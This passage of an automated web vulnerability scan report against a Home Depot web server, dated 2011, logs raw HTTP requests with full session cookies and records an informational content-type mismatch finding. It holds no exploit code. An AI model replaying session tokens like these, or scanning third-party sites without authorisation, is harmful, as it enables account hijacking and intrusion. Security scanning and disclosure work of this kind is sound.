Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; THD_SESSION=C34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22false%22%2c%22D1%22%3a%22%247%2e94%22%2c%22D2%22%3a%22%24241%2e06%22%7d%3a%3bC6%5fEXP%3d1313081163%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489162672%3a%3bC25%5fEXP%3d1362329162%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492763302%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c%2bNrrMNX%2fCejPLC6nTINfj0lqY5c%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310491415704%3B%20s_prevPage%3Dpage%2520header%253Epage_subhead%7C1310491415706%3B%20p_30%3Dno%2520value%7C1310491415707%3B; s_sess=%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 12 Jul 2011 16:53:43 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding
Cache-Control: no-store

File not found.

27.43. http://www6.homedepot.com/how-to/assets/images/modal/lightbox-close.png previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www6.homedepot.com
Path:	/how-to/assets/images/modal/lightbox-close.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /how-to/assets/images/modal/lightbox-close.png HTTP/1.1
Host: www6.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www6.homedepot.com/how-to/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; THD_SESSION=C34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22false%22%2c%22D1%22%3a%22%247%2e94%22%2c%22D2%22%3a%22%24241%2e06%22%7d%3a%3bC6%5fEXP%3d1313081163%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489162672%3a%3bC25%5fEXP%3d1362329162%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492763302%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c%2bNrrMNX%2fCejPLC6nTINfj0lqY5c%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310491415704%3B%20s_prevPage%3Dpage%2520header%253Epage_subhead%7C1310491415706%3B%20p_30%3Dno%2520value%7C1310491415707%3B; s_sess=%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "417fc0042ff66d7efb6463d64cec466a:1288648660"
Last-Modified: Mon, 01 Nov 2010 21:57:39 GMT
Accept-Ranges: bytes
Content-Length: 370
Content-Type: image/png
Date: Tue, 12 Jul 2011 16:56:38 GMT
Connection: close
Cache-Control: no-store

GIF89a8.....................@@@......sssMMM&&&ZZZ.........333fff..........................................!.......,....8.......$.di.h..l..p,.4.<.M..! ..#ab.~... .....4...D.+.Y....G)..8$...`0..QDd.1
...[SNIP]...

Report generated by XSS.CX at Tue Jul 12 20:31:37 CDT 2011.